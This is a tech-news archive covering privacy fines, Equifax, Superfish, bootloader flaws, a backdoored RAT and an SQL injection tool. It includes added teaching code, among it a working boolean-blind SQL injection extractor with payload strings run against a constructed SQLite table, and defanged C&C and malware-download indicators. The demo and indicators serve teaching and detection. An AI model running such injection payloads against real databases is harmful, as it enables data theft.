Category Archives: TechNews


Facebook slapped with $1.43 million fine for violating users’ privacy in Spain



Facebook is once again in trouble over its users' privacy: the social media giant has been heavily fined for a series of privacy violations in Spain.

Recently, Google also incurred a record-breaking fine of $2.7 billion (€2.42 billion) by the European antitrust officials for unfairly manipulating search results since at least 2008.
Now, the Spanish Data Protection Agency (AEPD) has issued a €1.2 million (nearly $1.4 million) fine against Facebook for breaching laws designed to protect people's personal information and confidentiality.


According to the data protection watchdog, the social network collects its users' personal data without their "unequivocal consent" and profits by sharing the data with advertisers and marketers.

The AEPD also found that Facebook collects sensitive data on users' ideology, religious beliefs, sex, personal tastes and browsing, either directly from its own services or through third parties, without clearly informing its users how this information will be used.

This activity constituted a “very serious” infringement of the country’s local data protection law (LOPD), for which the authority fined the company €600,000 ($718,062).

The regulator also identified two “serious” violations of privacy laws, including:
  1. Tracking people through the use of “Like” button social plug-ins embedded in other non-Facebook web pages—for which it is fined €300,000 ($359,049).
  2. Failing to delete data collected from users once it has finished using it; instead, the company "retains and reuses it later associated with the same user". This resulted in another €300,000 ($359,049) fine.
The AEPD also said that Facebook’s existing privacy policy contains “generic and unclear terms,” and doesn’t “adequately collect the consent of either its users or nonusers, which constitutes a serious infringement.”
“Users choose which information they want to add to their profile and share with others,” said Sally Aldous, a company spokeswoman. “We do not use this information to target adverts to people.”
While the Spanish agency has become one of the few privacy watchdogs worldwide to issue financial penalties against the social networking giant, the fine represents a mere rounding error to the company’s tens of billions of dollars of revenue generated each year.
In May, the French data protection authority also fined Facebook €150,000, its maximum fine, for violations similar to those found by its Spanish counterpart. The social network denies any wrongdoing.
Facebook has become a lightning rod for controversy over how it collects and uses people's online information, as well as over its role in disseminating fake news and hate speech to users around the globe.

Microsoft shrugs off Windows kernel bug that can block malware detection

According to a write-up on enSilo's Breaking Malware blog, the bug is a coding error in the handling of PsSetLoadImageNotifyRoutine, the kernel API a driver uses to register for notification whenever a module (a PE image) is loaded. "During research into the Windows kernel, we came across an interesting issue with PsSetLoadImageNotifyRoutine which as its name implies, notifies of module loading," the firm explains on its blog.

The Microsoft Security Response Center has been sitting on the report all year. The bug can render security tools useless: it undermines the very mechanism those tools register with in order to be told about potentially malicious modules as they load.
“The thing is, after registering a notification routine for loaded PE images with the kernel the callback may receive invalid image names.
“After digging into the matter, what started as a seemingly random issue proved to originate from a coding error in the Windows kernel itself. This flaw exists in the most recent Windows 10 release and past versions of the operating system, dating back to Windows 2000.”
The bug defeats the purpose of PsSetLoadImageNotifyRoutine, which security products rely on to spot malicious modules as they are loaded into Windows. It is also rather ironic. Bleeping Computer spoke to one of the researchers, Omri Misgav, who said that Microsoft did not consider the issue a security problem.
“We did not test any specific security software,” Misgav told Bleeping Computer. “We are aware that some vendors do use this mechanism, however at this point in time we cannot say if and how the use of the faulty [PsSetLoadImageNotifyRoutine] information affects them.”
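As an added illustration (not enSilo's or Microsoft's code), the block below models in user mode the minimum a driver author should do with the FullImageName that a PsSetLoadImageNotifyRoutine callback receives: parse the UNICODE_STRING from raw memory and refuse to act on one whose invariants do not hold. The 64-bit struct layout, the fake memory map and the paths are assumptions of the demo; the real callback receives a kernel pointer, not bytes. Note what the check cannot do: a well-formed name that points at the wrong file passes, which is exactly why enSilo's finding matters for products that trust the name alone.

```python
"""Sanity checks on the UNICODE_STRING an image-load callback receives.

Added illustration, not enSilo's or Microsoft's code. A user-mode model of the
FullImageName argument of a PsSetLoadImageNotifyRoutine callback: the struct
and its buffer are read from a constructed memory map and rejected when the
invariants do not hold. Assumes the x64 layout of UNICODE_STRING:
USHORT Length, USHORT MaximumLength, 4 bytes padding, 8-byte PWSTR Buffer.
"""
import struct

UNICODE_STRING_FMT = "<HH4xQ"
UNICODE_STRING_SIZE = struct.calcsize(UNICODE_STRING_FMT)  # 16


class FakeMemory:
    """Constructed stand-in for kernel address space: {base: bytes}."""

    def __init__(self, regions):
        self.regions = dict(regions)

    def read(self, addr, size):
        """Bytes at [addr, addr+size) if fully inside one region, else None.
        A real driver that dereferences an unmapped Buffer bug-checks here."""
        for base, data in self.regions.items():
            if base <= addr and addr + size <= base + len(data):
                return data[addr - base:addr - base + size]
        return None


def read_image_name(mem, us_addr):
    """Return the NT path held by the UNICODE_STRING at us_addr, or None if the
    struct cannot be trusted. None means: do not classify the image by name."""
    raw = mem.read(us_addr, UNICODE_STRING_SIZE)
    if raw is None:
        return None
    length, max_length, buf = struct.unpack(UNICODE_STRING_FMT, raw)
    # Invariants every well-formed UNICODE_STRING satisfies.
    if buf == 0 or length == 0 or length % 2 or length > max_length:
        return None
    data = mem.read(buf, length)
    if data is None:
        return None
    try:
        name = data.decode("utf-16-le")
    except UnicodeDecodeError:
        return None
    # Embedded NULs or a non-NT path point at a stale or partially built name.
    if "\x00" in name or not name.startswith("\\"):
        return None
    return name


def build_unicode_string(text, buf_addr, max_length=None):
    """Test fixture: (packed UNICODE_STRING, UTF-16LE buffer contents)."""
    data = text.encode("utf-16-le")
    if max_length is None:
        max_length = len(data)
    return struct.pack(UNICODE_STRING_FMT, len(data), max_length, buf_addr), data


NTDLL = "\\Device\\HarddiskVolume2\\Windows\\System32\\ntdll.dll"  # constructed path


def demo():
    """Four callbacks: one trustworthy name, three that must be ignored."""
    us, buf = build_unicode_string(NTDLL, 0x2000)
    good = FakeMemory({0x1000: us, 0x2000: buf})
    # Length larger than MaximumLength: inconsistent header.
    bad_len, _ = build_unicode_string(NTDLL, 0x2000, max_length=8)
    # Buffer pointing into unmapped memory.
    dangling, _ = build_unicode_string(NTDLL, 0x9000)
    # Win32-style path where the kernel would always hand out an NT path.
    win32_us, win32_buf = build_unicode_string("C:\\Windows\\System32\\ntdll.dll", 0x2000)
    return (
        read_image_name(good, 0x1000),
        read_image_name(FakeMemory({0x1000: bad_len, 0x2000: buf}), 0x1000),
        read_image_name(FakeMemory({0x1000: dangling, 0x2000: buf}), 0x1000),
        read_image_name(FakeMemory({0x1000: win32_us, 0x2000: win32_buf}), 0x1000),
    )
```

A driver that gets None back should fall back to another source of identity for the image (for instance the process or file object it already has a handle to) rather than skip the module, since skipping is precisely the outcome an attacker wants.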

Samsung wants you to hack its devices and get up to $200,000
Android is one of the most heavily targeted mobile operating systems, and Samsung makes the world's most widely used Android phones. Taken together, those two facts make Samsung devices a lucrative target for hackers and cyber criminals.
While Google is implementing security measures to tackle this threat, Samsung has launched a bug bounty program urging hackers and IT security researchers to find critical security flaws and vulnerabilities so that the company can fix them before criminals get their hands on them.
In return, the company will pay between USD 200 and USD 200,000 for valid reports. An important thing to keep in mind is that Samsung only accepts reports demonstrating remote attacks, not attacks that require physical access. Vulnerabilities in third-party applications are not eligible either, unless the application was developed for Samsung (see the scope below).
"Through this rewards program, we hope to build and maintain valuable relationships with researchers who coordinate disclosure of security issues with Samsung Mobile," said Samsung.
Security vulnerability reports must apply to eligible Samsung Mobile devices, services, applications developed and signed by Samsung Mobile, or eligible third-party applications developed for Samsung.

  • Eligible Samsung Mobile Devices in their latest available Android version and firmware:
  • Galaxy S series (S8, S8+, S8 Active, S7, S7 edge, S7 Active, S6 edge+, S6, S6 edge, S6 Active)
  • Galaxy Note series (Note 8, Note FE, Note 5, Note 4, Note edge)
  • Galaxy A series (A3 (2016), A3 (2017), A5 (2016), A5 (2017), A7 (2017))
  • Galaxy J series (J1 (2016), J1 Mini, J1 Mini Prime, J1 Ace, J2 (2016), J3 (2016), J3 (2017), J3 Pro, J3 Pop, J5 (2016), J5 (2017), J7 (2016), J7 (2017), J7 Max, J7 Neo, J7 Pop)
  • Galaxy Tab series (Tab S2 L Refresh, Tab S3 9.7)
“We take security and privacy issues very seriously; and as an appreciation for helping Samsung Mobile improve the security of our products and minimizing risk to our end-consumers, we are offering a rewards program for eligible security vulnerability reports,” explained Samsung.


Hackers Can Remotely Access Syringe Infusion Pumps to Deliver Fatal Overdoses

4X Human Traffic To Your Blogger Blog In No Time

A few months ago Harsh Agrawal showed off his page views for June 2017 and his earnings. Many people were shocked, and someone said it was because he has been in the game for a long time. That is true to an extent, but looked at from another perspective it is false.

Driving 1.5 million page views a month to your blog does not only require having been in the game for a long time; it also requires knowing what to do. Harsh is one of the bloggers I have seen doing real research, from proper SEO optimization to email marketing, and his latest trend is push notifications.



In his words: "If you are looking for one takeaway from this traffic report, it would be focusing on SEO and making sure to offer quality articles to your readers are always good things to do.

Another tip that I can give you is to take advantage of push notifications. Use PushEngage or another similar service as this could be a great source of returning traffic for you."

When a blogger who receives 1.5 million page views a month mentions a traffic source and builds on it, that tells you there is power in push notifications.




Push Notification

Sincerely speaking, nobody reads emails. If I subscribed to your blog at some point, just know that I have never read any of your emails. Push notifications, on the other hand, are unavoidable, both mobile push and browser notifications.

So what is a push notification? It is a message sent to anyone who has agreed to receive notifications from your blog. Instead of sending them emails, you send a preview of the post to their browser. When a user is offline, they see it as soon as they come online; when they are online, they see it right away.


Push notifications have been one of the most reliable sources of real human traffic for a blog. To test this myself and see whether users really click on push notifications, I subscribed to the Entclass blog.


My Experience With Push Notification.


Entclass is a blog about cheats and technology, so to test how push messages work I subscribed to their list, expecting to ignore the messages, but I could not stop myself from clicking.

Whenever I was online I received the message instantly, the compelling titles always made me click, and when I was offline I met the notifications as soon as I logged in. That experiment taught me two good things about push notifications, and with these two things you can drive 4X your daily Blogger visitors.

Why your push notification setup failed

I have seen many Nigerian bloggers enable push notifications without knowing how they work, and in the end they fail at it. Getting traffic is a system that requires creativity and judgement. There are some things you need to do to get a head start on your competitors.

Often we mess things up. You could easily go to one of these websites, set up push notifications and still fail, simply because you saw someone talking about it and did not bother to learn how it works.


Best push notification practices that drive traffic


1. Market your sign-up button

By default, a pop-up box shows up asking your users to allow push notifications, and you probably think that will do the job. You are wrong. I personally would never accept that: in a world where people send each other viruses and hijack blogs, you expect me to just allow such a thing?

The truth is that many of your readers do not know what a push notification is; most of them feel it is spam, and that is why you get so few subscribers daily.

What is the solution? Educate your audience: tell them what the option does for them and how it keeps them updated instantly, and promote it the same way you promote your subscribe box, because it has the potential to drive thousands of daily visitors to your blog.

2. Push titles

If you just copy and paste the title of your post as the title of your push notification, you are getting it wrong again. Unless the title of your post has already been properly optimized for impact and SEO, do not use it. What do I mean? You need a title that converts.

Believe it or not, if your title is awful users will just close the box. Optimize your push title with positive power words that compel people to click. Be specific, keep it short and make sure it describes what the post is actually about.


3. Daily update bandwidth

The number of messages you send to my browser each day determines whether I stay on your list. Some bloggers push rubbish. Send only important and highly anticipated posts. Not every article should be sent out; some, as you yourself know, cannot pull a crowd.

News and gossip bloggers always find good headlines, and push always works for them. Explore your blog and share even old posts, as long as you know they can pull a crowd.

2 free push notification services that actually work

To round it all up, here are two great push notification services that actually work.

  1. PushEngage
  2. Pushify


PushEngage

This free service is excellent and can drive large volumes of traffic. It is used and endorsed by ShoutMeLoud. I started with it and, though not yet certain, I am still experimenting with it. PushEngage is a full-featured push notification service that can drive traffic from both mobile and desktop browsers.

It has many opt-in forms, including a sliding sidebar "Get Notifications" box that encourages your users to subscribe.

Pushify


I only recently learned about this one and have not used it, because my template is built for AMP and does not accept external JavaScript. Pushify has an excellent sign-up process, and although I have not used it, I believe they are good at what they do.

Push notifications vs Facebook sharing

I will keep this short, because I know you would love to compare. This is a big topic that deserves an article of its own. Both drive traffic, but it depends on your subscriber list and on the groups you share your posts in.

If you share a post to a group of 500k people, you cannot expect a subscriber list of just 200 people to drive more traffic.

But in terms of conversion rate, push notifications convert better, even better than email marketing.



More than 143 million records hacked at international company Equifax

As reported yesterday, the credit reporting agency Equifax was hacked by unknown attackers. Now, it is being reported that the credit giant has been slapped with a multi-billion-dollar lawsuit over the data breach in which personal details of 143 million consumers was stolen – This is over 40% of the entire population of the United States.

“Plaintiffs file this complaint as a national class action on behalf of over 140 million consumers across the Country harmed by Equifax’s failure to adequately protect their credit and personal information. This complaint requests Equifax provide fair compensation in an amount that will ensure every consumer harmed by its data breach will not be out-of-pocket for the costs of independent third-party credit repair and monitoring services,” the complaint reads.
In a complaint (PDF) filed by plaintiffs Brook Reinhard and Mary McHill (both had their data with Equifax) in federal court in Portland, Oregon, Equifax is accused of failing to implement proper security measures to protect consumer data in order to save money rather than spend it on security.
Remember, the stolen data includes names, addresses, birth dates and driver's license numbers, as well as credit card numbers of 209,000 consumers and dispute documents of 182,000 U.S. consumers. The data also included details of some Canadian and British residents.
All this was possible due to a "U.S. website application vulnerability" exploited "to gain access to certain files."
In an email conversation, Fleming Shi, SVP Technology at Barracuda Networks (https://www.barracuda.com), said that "This breach is a like a Category 5 hurricane in the cyber world, affecting at least one-third of the U.S. population. The lasting impact from the breach will go on for years. Although web applications attacks are common, there are two variations that may be relevant to this incident."
"1: In one instance, a company hosts software that is vulnerable to content injection or privilege escalation attacks. This vulnerability can easily be exploited, once discovered, as not every site is set up for auto updates.
2: In the second instance, web applications or website code is independently vulnerable and subject to various well-known application-level attacks. In such cases, if software exhibits vulnerability to common attacks like SQL injection, XSS or buffer overflow, this puts an organization at serious risk."
Previously, Experian also suffered a similar hack, leading to the theft of 15 million T-Mobile customers' data. The data was later sold on the dark web for as little as 0.8082 (USD 600.00).
"Web Applications vulnerabilities continue to be a critical exposure for many large organizations. Attackers have gotten more sophisticated at probing for flaws in the underlying frameworks that many of these applications are built on top of which can lead to widespread security exposures even for organizations with mature security programs and secure coding practices in place – As companies continue to pursue more rapid application development capabilities they need to ensure their security program keeps pace and travels at a similar speed," said Mike Cotton, Vice President of Research and Development at Digital Defense, Inc. (https://www.digitaldefense.com).
Law enforcement is investigating, but there is no denying this is a difficult situation for Equifax: first the data breach, and now a multibillion-dollar lawsuit.


jSQL – Automatic SQL Injection Tool for Java

jSQL is an automatic SQL injection tool written in Java. It is lightweight and supports 23 kinds of databases.

It is free, open source and cross-platform (Windows, Linux, Mac OS X), and is readily available in Kali, Pentest Box, Parrot Security OS, ArchStrike and BlackArch Linux.
Features

  • Automatic injection of 23 kinds of databases: Access, CockroachDB, CUBRID, DB2, Derby, Firebird, H2, Hana, HSQLDB, Informix, Ingres, MaxDB, Mckoi, MySQL (MariaDB), Neo4j, NuoDB, Oracle, PostgreSQL, SQLite, MS SQL Server, Sybase, Teradata, Vertica
  • Multiple injection strategies: Normal, Error, Blind and Time
  • SQL engine to study and optimise SQL expressions
  • Injection of multiple targets
  • Search for administration pages
  • Creation and visualisation of web shell and SQL shell
  • Read and write files on the host using injection
  • Brute-force of password hashes
  • Encode and decode a string
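The "Blind" strategy in the feature list is worth seeing by hand. The block below is an added example, not jSQL's code: it runs a deliberately injectable lookup against an in-memory SQLite database, recovers a column value through nothing but true/false answers, and then shows the parameterised query that defeats the same payloads. The users table, its single row and both lookup endpoints are constructed for the demo.

```python
"""Boolean-blind SQL injection worked end to end on a local SQLite database.

Added example, not jSQL's code: it reproduces by hand the 'Blind' strategy
a tool like jSQL automates, then shows the parameterised query that closes
the hole. The users table, its single row and the lookup endpoints are all
constructed for this demo.
"""
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, name TEXT, pw_hash TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'admin', 'e99a18c4')")  # constructed row

SECRET_EXPR = "SELECT pw_hash FROM users WHERE id = 1"  # what the attacker is after


def vulnerable_lookup(user_input):
    """Simulated endpoint that concatenates input into SQL.
    The only thing it leaks is whether any row matched (True/False)."""
    sql = "SELECT id FROM users WHERE name = '%s'" % user_input
    return conn.execute(sql).fetchone() is not None


def safe_lookup(user_input):
    """Hardened endpoint: the input is bound as data, never parsed as SQL."""
    row = conn.execute("SELECT id FROM users WHERE name = ?", (user_input,)).fetchone()
    return row is not None


def blind_extract(oracle, expr, max_len=64):
    """Recover the string value of `expr` one character at a time using only a
    yes/no oracle. Each probe appends a condition to a known-true predicate:
        admin' AND unicode(substr((expr), pos, 1)) > mid --
    and a binary search over the ASCII range pins each code point in 7 probes."""
    result = ""
    for pos in range(1, max_len + 1):
        # Stop when the value has no character at this position.
        if not oracle(f"admin' AND length(({expr})) >= {pos} -- "):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"admin' AND unicode(substr(({expr}), {pos}, 1)) > {mid} -- "):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result
```

Against vulnerable_lookup the extraction returns the stored hash in about 60 requests; against safe_lookup the very first probe is treated as a literal user name, matches nothing, and the loop ends with an empty string. jSQL's Error and Time strategies differ only in how the oracle's answer is read back (from an error message or a response delay), not in the inference loop above.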
Installation

Install Java 8, then download the latest release of jSQL Injection and double-click jsql-injection-v0.79.jar to launch the software. You can also run java -jar jsql-injection-v0.79.jar in a terminal. On Kali Linux, get the latest release with apt update followed by apt full-upgrade.
Future Roadmap

  • Netezza support
  • Test coverage with Jacoco
  • Integration tests with Docker and JPA, Hibernate, jOOQ
  • Maven
  • Core swing CLI
  • Full Path Disclosure
  • DIOS, Routed Query, OOB, Update/Insert/Delete
  • Brute-force HTTP Auth using NTLM
  • Arabic translation
  • Command-line interface
  • Dictionary attack
  • WAF detection
  • Program self-updater


750,000 Lenovo Laptops have Spyware in them

FTC chairman Maureen Ohlhausen told reporters on Tuesday during a teleconference that some 750,000 Lenovo laptops sold between August 2014 and June 2015 came pre-installed with a program called VisualDiscovery, made by the Palo Alto, California-based firm Superfish. The software acted as a "man-in-the-middle" between a customer's browser and the websites they visited. Intercepting HTTPS traffic this way required installing Superfish's own root certificate in the laptop's trust store, which is why the browser raised no warning.
"Imagine the online equivalent of someone, without your knowledge, intercepting your mail, opening it, reading it, resealing it and placing it back in your mailbox," Ohlhausen said. "That's what we claim the software did."
As for how VisualDiscovery scraped user data to make money, one security firm offers this example: "If you're looking at an ad for a chest of drawers, Superfish, going by the model on its own website, can help you find a matching sideboard (credenza)." The software would then "keep its eye out for similar sites, all based on models instead of relying on old-fashioned keywords."
It would also keep an eye on customers' personal data, such as login credentials, Social Security numbers, bank account information, medical data and emails, researchers found. And if you visited a "spoofed" website, one that looked like a furniture retailer but was built specifically to capture data, you were out of luck.
How did this happen, exactly? Superfish is a third-party service provider, and while Ohlhausen did not say that Lenovo was unaware the software was spying on customers, she did call on device makers to be careful about partnering with marketers whose software may not have the best intentions.
"Everybody in the chain needs to pay attention," she said. "This happened to be one of the world's biggest computer manufacturers, and I think it sends an important message: if you are going to install these sorts of software, you need to pay attention to what it's collecting, what you're telling consumers and the kinds of risks that it might be creating."
The affected Lenovo models were mostly in its lower-priced range, consistent with the criticism that Superfish was targeting lower-income or younger consumers. Included lines were the E-Series, Edge Series, Flex Series, G-Series, Miix Series, S-Series, U-Series, Y-Series, Yoga Series and Z-Series.

Mobile Bootloaders From Top Manufacturers Found Vulnerable to Persistent Threats

Security researchers have found several severe zero-day vulnerabilities in the mobile bootloaders of at least four popular device manufacturers that could allow an attacker to gain persistent root access on the device.
A team of nine security researchers from the University of California, Santa Barbara created a special static binary analysis tool called BootStomp that automatically detects security vulnerabilities in bootloaders.
Since bootloaders are usually closed source and hard to reverse-engineer, analysing them is difficult, especially because their dependencies hinder dynamic analysis.

Therefore, the researchers created BootStomp, which "uses a novel combination of static analysis techniques and underconstrained symbolic execution to build a multi-tag taint analysis capable of identifying bootloader vulnerabilities."
The tool helped the researchers uncover six previously unknown critical security bugs across bootloaders from HiSilicon (Huawei), Qualcomm, MediaTek and NVIDIA, which could be exploited by attackers to unlock the device bootloader and install a custom malicious ROM and persistent rootkits.
Five of the vulnerabilities have already been confirmed by the respective chipset vendors. The researchers also found a known bug (CVE-2014-9798) in Qualcomm's bootloaders, which was previously reported in 2014 but is still present and exploitable.
In a research paper [PDF] titled "BootStomp: On the Security of Bootloaders in Mobile Devices," presented at the USENIX Security conference in Vancouver, the researchers explain that some of the discovered flaws even allow an attacker with root privileges on the Android operating system to execute malicious code as part of the bootloader or to carry out permanent denial-of-service attacks.

According to the researchers, the vulnerabilities affect ARM's "Trusted Boot" or Android's "Verified Boot" mechanisms that chipset vendors have implemented to establish a Chain of Trust (CoT), which verifies the integrity of every component the system loads while booting the device.

Overview: Discovered Bootloader Vulnerabilities

The researchers examined five different bootloader implementations: the Huawei P8 ALE-L23 (Huawei/HiSilicon chipset), the Nexus 9 (NVIDIA Tegra chipset), the Sony Xperia XA (MediaTek chipset) and two versions of the LK-based bootloader developed by Qualcomm.
The researchers found five critical vulnerabilities in the Huawei Android bootloader:
  • An arbitrary memory write or denial of service (DoS) issue when parsing the Linux kernel's DeviceTree (DTB) stored in the boot partition.
  • A heap buffer overflow issue when reading the root-writable oem_info partition.
  • A root user's ability to write the nve and oem_info partitions, from which configuration data and the memory access permissions governing the smartphone's peripherals are read.
  • A memory corruption issue that could allow an attacker to install a persistent rootkit.
  • An arbitrary memory write bug that lets an attacker run arbitrary code as the bootloader itself.
Another flaw was found in NVIDIA's hboot, which runs at EL1, meaning it has the same privilege level as the Linux kernel; once compromised, it can let an attacker gain persistence.
The researchers also found a known, already patched vulnerability (CVE-2014-9798) in older versions of Qualcomm's bootloader that could be exploited to cause a denial-of-service condition.
The researchers reported all the vulnerabilities to the affected vendors. Huawei confirmed all five vulnerabilities, and NVIDIA is working with the researchers on a fix.
The team has also proposed a series of mitigations to both limit the attack surface of the bootloader and enforce various desirable properties aimed at safeguarding users' security and privacy.
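The first Huawei bug above, memory corruption while parsing the DTB from the boot partition, is the classic shape of a bootloader flaw: header offsets and lengths read from a partition the attacker can write are used as indices without being checked against the blob. The block below is an added example, not BootStomp's or Huawei's code; it is a small flattened-device-tree parser in which every access is bounded by the blob's own totalsize, together with a builder that constructs a valid blob and corruptions of the kind a malicious boot image would carry. The token values, header layout and node/property format are those of the standard FDT encoding; the blob contents are constructed.

```python
"""Bounds-checked parser for a flattened device tree (DTB) blob.

Added example, not BootStomp's or Huawei's code. A bootloader that trusts
the offsets and lengths in a DTB header can be steered to read or write
outside the blob; every access here is checked against `totalsize` first.
The blobs built by build_dtb() are constructed for the demo.
"""
import struct

FDT_MAGIC = 0xD00DFEED
FDT_BEGIN_NODE, FDT_END_NODE, FDT_PROP, FDT_NOP, FDT_END = 1, 2, 3, 4, 9
# magic, totalsize, off_dt_struct, off_dt_strings, off_mem_rsvmap, version,
# last_comp_version, boot_cpuid_phys, size_dt_strings, size_dt_struct
HEADER_FMT = ">10I"
HEADER_SIZE = struct.calcsize(HEADER_FMT)  # 40


class BadDtb(ValueError):
    """Raised instead of touching memory outside the blob."""


def _u32(blob, off, limit):
    if off < 0 or off + 4 > limit:
        raise BadDtb(f"u32 at 0x{off:x} would cross 0x{limit:x}")
    return struct.unpack_from(">I", blob, off)[0]


def _cstr(blob, off, limit):
    end = blob.find(b"\0", off, limit) if off < limit else -1
    if end < 0:
        raise BadDtb(f"string at 0x{off:x} not terminated before 0x{limit:x}")
    return blob[off:end].decode("ascii"), end + 1


def parse_dtb(blob):
    """Return {node_path: {prop_name: value_bytes}}; raise BadDtb on any
    offset or length that would leave the blob."""
    if len(blob) < HEADER_SIZE:
        raise BadDtb("shorter than header")
    (magic, totalsize, off_struct, off_strings, _rsv, _ver, _comp, _cpu,
     size_strings, size_struct) = struct.unpack_from(HEADER_FMT, blob, 0)
    if magic != FDT_MAGIC:
        raise BadDtb("bad magic")
    # Every header field is attacker-controlled: validate before indexing.
    if not HEADER_SIZE <= totalsize <= len(blob):
        raise BadDtb("totalsize outside buffer")
    struct_end, strings_end = off_struct + size_struct, off_strings + size_strings
    if off_struct < HEADER_SIZE or struct_end > totalsize or strings_end > totalsize:
        raise BadDtb("struct or strings block outside totalsize")

    nodes, path, pos = {}, [], off_struct
    while True:
        tok = _u32(blob, pos, struct_end)
        pos += 4
        if tok == FDT_BEGIN_NODE:
            name, pos = _cstr(blob, pos, struct_end)
            path.append(name)
            nodes["/" + "/".join(p for p in path if p)] = {}
        elif tok == FDT_END_NODE:
            if not path:
                raise BadDtb("END_NODE without BEGIN_NODE")
            path.pop()
        elif tok == FDT_PROP:
            plen, nameoff = _u32(blob, pos, struct_end), _u32(blob, pos + 4, struct_end)
            pos += 8
            if not path or plen > struct_end - pos:  # length checked before slicing
                raise BadDtb("property outside node or struct block")
            pname, _ = _cstr(blob, off_strings + nameoff, strings_end)
            nodes["/" + "/".join(p for p in path if p)][pname] = blob[pos:pos + plen]
            pos += plen
        elif tok == FDT_NOP:
            continue
        elif tok == FDT_END:
            if path:
                raise BadDtb("FDT_END with open nodes")
            return nodes
        else:
            raise BadDtb(f"unknown token {tok}")
        pos = (pos + 3) & ~3  # tokens are 4-byte aligned


def build_dtb(props):
    """Construct a minimal valid DTB: an empty memory-reserve map and a root
    node carrying the given {name: bytes} properties."""
    strings, name_off = b"", {}
    for n in props:
        name_off[n] = len(strings)
        strings += n.encode() + b"\0"
    body = struct.pack(">I", FDT_BEGIN_NODE) + b"\0\0\0\0"  # root name "" plus pad
    for n, v in props.items():
        body += struct.pack(">III", FDT_PROP, len(v), name_off[n]) + v + b"\0" * (-len(v) % 4)
    body += struct.pack(">II", FDT_END_NODE, FDT_END)
    off_struct = HEADER_SIZE + 16  # header, then one all-zero reserve entry
    off_strings = off_struct + len(body)
    hdr = struct.pack(HEADER_FMT, FDT_MAGIC, off_strings + len(strings), off_struct,
                      off_strings, HEADER_SIZE, 17, 16, 0, len(strings), len(body))
    return hdr + b"\0" * 16 + body + strings


def corrupt_u32(blob, off, value):
    """Test helper: copy of blob with the big-endian u32 at `off` replaced."""
    out = bytearray(blob)
    struct.pack_into(">I", out, off, value)
    return bytes(out)


def is_rejected(blob):
    """True if parse_dtb refuses the blob instead of reading out of bounds."""
    try:
        parse_dtb(blob)
    except BadDtb:
        return True
    return False
```

In the constructed blob the struct block starts at offset 56, so offset 8 is off_dt_struct, 68 is the first property's length and 72 its name offset; overwriting any of them with a large value is exactly the input a bootloader without these checks would dereference.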

Free Cobian RAT Offered on Underground Hacking Forums Comes With a Backdoor

A remote access trojan (RAT) offered as a free download on underground hacking forums comes with a secret backdoor that grants the original author access to all of the victims' data.
This new malware strain, advertised as Cobian RAT, has been offered for free to other crooks since February 2017, according to Deepen Desai, Senior Director of Research at cyber-security firm Zscaler.
Desai says the original author is offering a "free builder" that allows other crooks to create their own version of the Cobian RAT with customized settings.
Others took this builder, created their customized Cobian RATs and distributed the payloads, infecting other users.

Cobian RAT backdoored using Pastebin file

Unknown to the wannabe hackers who downloaded the RAT, these customized versions secretly connect to a Pastebin URL that is under the original author’s control from where they receive new commands.
"The [Pastebin file] corresponding to the builder variant that we analyzed has 4,055 unique visitor hits till now, indicating the number of systems infected," Desai told Bleeping Computer in an email today.
These are systems to which two crooks have access: first the hacker who distributed the customized Cobian RAT, and then the RAT's original author.

Cobian RAT has bugs

The good news is that Cobian is not the smash hit other free RATs were in the past. For starters, not all the features work as intended.
“In our limited testing of the keylogger module, we observed some flakiness that it was not accurately capturing all the keystrokes when [a] user types […] a little fast,” Desai told Bleeping.
This may be why the RAT is not as popular, despite being offered for free for almost half a year. At the time of writing, researchers have rarely seen Cobian used in the wild.
"We haven't seen any large scale campaign involving Cobian RAT," Desai told Bleeping, "but [we] have been seeing a few isolated incidents where it was being delivered via a compromised website."
Nonetheless, Cobian isn't the epic failure you might presume. Leaving aside the backdoor and the flaky keylogger component, Cobian isn't far behind what competitors offer.
"The RAT contains all the standard features available in free/paid RATs. We have listed the full set of features in our blog," Desai added.
Despite this, the discovery of the backdoor has likely killed any future Cobian development, as few users will be willing to risk downloading the tool now. Zscaler has put together an infographic on Cobian's modus operandi.
Indicators of Compromise

  • MD5: 94911666a61beb59d2988c4fc7003e5a
  • Zip file MD5: 7eede7047d3d785db248df0870783637
  • Source URL: belkomsolutions[.]com/t/guangzhou%20sonicstar%20electronics%20co%20ltd.zip
  • C&C: swez111.ddns[.]net:20000 (173.254.223.81)
  • File name: GUANGZHOU SONICSTAR ELECTRONICS CO. LTD.exe
  • Compilation timestamp: 2017-07-11 03:53:14
  • Digitally signed: Vendor /C=FR/L=Paris/O=VideoLAN/CN=VideoLAN
  • Signing date: 11:24 AM 7/14/2017
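The indicators above only help if something matches them against local evidence. The block below is an added example, not Zscaler's code: it refangs the indicators exactly as they appear on the page, runs them over a few DNS, firewall and proxy log lines, and hashes a file body against the listed MD5s. The log lines and the file content are constructed for the demo, so the hash check is expected to miss; the domain and C&C matches are expected to fire.

```python
"""Match the Cobian RAT indicators above against local evidence.

Added example, not Zscaler's code. The indicator values are the ones on the
page (defanged); the log lines and file bytes below are constructed for the
demo, so their hashes will not match the real sample.
"""
import hashlib
import re

IOCS = {
    "md5": {"94911666a61beb59d2988c4fc7003e5a", "7eede7047d3d785db248df0870783637"},
    "domains": {"belkomsolutions[.]com", "swez111.ddns[.]net"},
    "ips": {"173.254.223.81"},
    "c2_port": 20000,
}


def refang(indicator):
    """Turn the defanged form used in reports back into a matchable value."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


DOMAINS = {refang(d) for d in IOCS["domains"]}
# A host name is a dotted run of labels ending in an alphabetic TLD, bounded
# by characters that cannot belong to a host name (so 'name=' and '/' work).
DOMAIN_RE = re.compile(r"(?<![A-Za-z0-9.-])((?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,})(?![A-Za-z0-9-])")
IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})(?::(\d+))?\b")


def scan_log_line(line):
    """Return [(type, value), ...] for every indicator hit in one log line."""
    hits = []
    for m in DOMAIN_RE.finditer(line):
        host = m.group(1).lower()
        if host in DOMAINS or any(host.endswith("." + d) for d in DOMAINS):
            hits.append(("domain", host))
    for m in IP_RE.finditer(line):
        ip, port = m.group(1), m.group(2)
        if ip in IOCS["ips"]:
            hits.append(("ip", ip))
            if port and int(port) == IOCS["c2_port"]:
                hits.append(("c2_port", f"{ip}:{port}"))
    return hits


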